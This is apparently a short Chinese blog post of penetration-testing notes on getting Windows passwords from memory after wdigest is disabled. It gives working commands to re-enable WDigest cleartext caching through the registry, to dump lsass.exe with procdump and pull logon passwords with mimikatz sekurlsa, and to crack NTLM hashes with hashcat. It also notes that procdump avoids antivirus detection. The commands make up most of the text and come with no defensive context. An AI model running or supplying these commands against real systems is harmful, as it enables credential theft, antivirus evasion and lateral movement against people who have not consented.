标签:16px cat 默认 uri 服务 攻击 sys aci tco
#知识点1:
Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码
针对以上情况,我们提供了4种方式解决此类问题
1.利用哈希hash传递(pth,ptk等)进行移动
2.利用其它服务协议(SMB,WMI等)进行哈希移动
3.利用注册表操作开启Wdigest Auth值进行获取
4.利用工具或第三方平台(Hachcat)进行破解获取
#知识点2:
Windows系统LM Hash及NTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash。
#注册表修改
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
hashcat -a 0 -m 1000 hash file --force //爆破哈希的软件
1-Procdump+Mimikatz配合获取
procdump是微软开发的所以不会被杀,如果mimikatz被杀的情况下可以用这个配合导出密码
#procdump配合mimikatz
procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz上执行:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
#Pwdump7
#QuarksPwdump
标签:16px cat 默认 uri 服务 攻击 sys aci tco
原文地址:https://www.cnblogs.com/trevain/p/14056600.html